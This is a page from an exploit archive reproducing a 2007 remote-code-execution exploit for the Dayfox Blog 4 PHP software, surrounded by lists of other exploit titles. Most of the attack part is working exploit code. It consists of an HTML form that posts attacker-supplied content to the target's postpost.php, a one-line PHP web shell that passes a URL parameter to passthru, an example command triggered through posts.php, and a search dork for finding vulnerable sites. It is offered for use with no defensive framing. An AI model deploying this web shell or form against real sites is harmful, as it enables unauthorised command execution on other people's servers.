exploits , vulnerabilities , articles , Dayfox Blog 4 (postpost.php) Remote Code Execution Vulnerability

2007-04-14 QDBlog 0.4 (SQL Injection/LFI) Multiple Remote Vulnerabilities
2007-04-09 MyBlog: PHP and MySQL Blog/CMS software RFI Vulnerability
2007-04-03 Xoops Module PopnupBlog <= 2.52 (postid) BLIND SQL Injection Exploit
2007-03-30 sBLOG 0.7.3 Beta (inc/lang.php) Local File Inclusion Exploit
2007-03-20 GeBlog 0.1 GLOBALS[tplname] Local File Inclusion Exploit (win)
2007-03-16 Particle Blogger <= 1.2.0 (post.php postid) Remote SQL Injection Exploit

2007-03-14

Dayfox Blog 4 (postpost.php) Remote Code Execution Vulnerability

Rated as : Moderate Risk

<html>
<!--
                                                         
.-""""""""-.                       
         
                                                         /   Dj7xpl   \   
                          
                                                        |              |  
                             
                                                        |,  .-.  .-.  ,|  
                             
                                                        | )(_o/  \o_)( |  
                                  
                                                        |/     /\     \|  
                              
                                              (@_       (_     ^^     _)  
               
                                         _     )
\_______\__|IIIIII|__/_______________________________
                                       
(_)@8@8{}<________|-\IIIIII/-|________________________________>
                                               )_/        \          / 
                                               (@
											   
+_______________________________________________Iranian Are The Best In
World___________________________________________+
#
#
#   Portal     :   Dayfox Blog V 4
#   Download   :   http://www.dayfoxdesigns.co.nr
#   Dork       :   "Powered by Dayfox Designs"
#   Author     :   Dj7xpl  | Dj7xpl@yahoo.com
#   Risk       :   High (Remote Code Execution)
#
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#   1- Insert Your Script In Text File By This Exploit     Example:
<?php passthru($_GET[cmd]); ?>
#   2- include Text File By (Posts.php)                    Example:
http://localhost/dfblog/posts.php?cmd=ls -la
#
#
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#    Sp Tnx      :  Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir,
Shabgard.org,Simorgh .............
#
#
+_______________________________________________________________________________________________________________________+

-->
<head><title>--======Dj7xpl======--</title></head>
<body background=http://dj7xpl.by.ru/img/scan.gif> 
<center>
<form action="http://[Target]/[path]/postpost.php"
method="post">
            <input type="hidden" name="title"
value="Dj7xpl" />
	        <input type="hidden"  name="blog"
value="script" /><br><br>
			<font color=#C0FF3E size=+1>your script:<br>
            <textarea name="cat"></textarea>
	        <input type="hidden" name="date"
value="Hello All" />
	        <input type="hidden" name="catyear"
value="dj7xpl" />
       	    <input  type="hidden" name="catmonth"
value"dj7xpl" />
				<input type="submit" value="write" />
			</form>
			</center>
			</body
			</html>

securitydot.net - 2007-03-14

Exploits - newest 10 RSS | More

2007-06-15 57287 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34213 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42435 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29336 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19773 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16710 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19408 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16595 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33610 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17235 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit